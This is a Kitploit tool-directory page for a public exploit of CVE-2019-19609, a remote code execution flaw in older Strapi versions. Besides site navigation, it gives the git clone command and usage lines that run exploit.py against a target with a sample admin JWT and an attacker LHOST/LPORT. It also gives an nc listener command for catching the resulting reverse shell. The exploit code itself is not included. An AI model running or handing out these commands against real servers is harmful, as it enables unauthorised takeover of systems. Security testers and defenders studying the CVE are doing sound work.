Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-19609-EXPLOIT — Exploit for CVE-2019-19609 in Strapi (Remote Code Execution) | Kitploit
Tools/GitHubGitHub/diego-tella/cve-2019-19609-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubdiego-tella/cve-2019-19609-exploit

CVE-2019-19609-EXPLOIT

Exploit for CVE-2019-19609 in Strapi (Remote Code Execution)

View Repository
934 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-19609-EXPLOIT

Exploit for CVE-2019-19609 in Strapi (Remote code execution in strapi-3.0.0-beta.17.7 or earlier).
I was faced with a scenario with this vulnerability, but without a public exploit. I decided to create my own and share it here.

Instalation

root@kitploit:~
git clone https://github.com/diego-tella/CVE-2019-19609-EXPLOIT

Usage

root@kitploit:~
cd CVE-2019-19609-EXPLOIT
python exploit.py -d DOMAIN_OR_IP -jwt JSON_WEB_TOKEN -l LHOST -p LPORT
root@kitploit:~
python exploit.py -d example.com -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMjU3NDc3LCJleHAiOjE2MzI4NDk0Nzd9.JIKHRz_EDXg1fhThRhIbIyZ9w-6mE01dhnno2AtMMU0 -l 10.10.14.86 -p 1221

On another terminal, starts listening to the port passed in the exploit

root@kitploit:~
nc -vnlp 1221
Download Tool